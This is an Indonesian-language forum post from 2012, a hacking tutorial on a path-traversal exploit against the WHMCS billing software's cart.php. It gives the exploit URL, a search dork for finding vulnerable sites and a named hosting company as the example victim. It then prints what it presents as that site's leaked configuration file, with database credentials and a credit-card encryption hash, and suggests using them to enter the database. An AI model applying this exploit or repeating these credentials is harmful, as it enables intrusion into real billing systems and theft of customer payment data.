Hack WHMCS

djrhiby · Post by **djrhiby** » Sun Feb 26, 2012 8:18 pm

salam kenal neh gan mungkin ini baru pertama kali saya share ya kali ini saya mau share tentang
Hack WHMCS ??? waduuhh emang nya gimana ya

di dunia ini tidak ada security yang 100% menurut saya ya gan

totur ini juga butuh kesabaran

jadi jangan terlalu nafsu ya gan

ok deh kita ke take point aja ya
semoga gak repost ini
Exploiti Powered by whmcs
/cart.php?a=

cart.php?a=test&templatefile=../../../configuration.php%00

untuk dork nya saya biasa memakai ini gan
inurl:whmcs/cart.php?a=

mungkin dork bisa dengan imajinasi kalian

untuk korban saya saya kasih deh buat pembelajaran saja

Code: Select all

https://www.600host.net/billing/cart.php

tambahkan aja belakang cart.php ganti dengan exploit ini

Code: Select all

cart.php?a=test&templatefile=../../../configuration.php%00

ntar hasil nya akan begini gan

Code: Select all

https://www.600host.net/billing/cart.php?a=test&templatefile=../../../configuration.php

kalau sudah enter tampilan akan kosong
contoh gambar

nah kalau sudah kita tekan CTRL+U kita lihat di bagian ini

code di bagian ini

Code: Select all

<?php
$license="c82f91de790f";
$db_host = "localhost";
$db_username = "host_whmcs";
$db_password = "}|jkxpHl-pU6";
$db_name = "host_whmcs";
$cc_encryption_hash = "gyD5g3OMqdMlszfhWiKAjzwxTQByVNu1bYWhRBT8FwkXVp5IyF9H5w4OcwdX9xPa"; 
$templates_compiledir = "templates_c/"; 
$display_errors=true;
?>

taraaa kita berhasil mendapatkan database

selanjut nya bisa kita menggunakan phpmyadmin / filezilla
semoga totur ini bermanfaat

[email protected]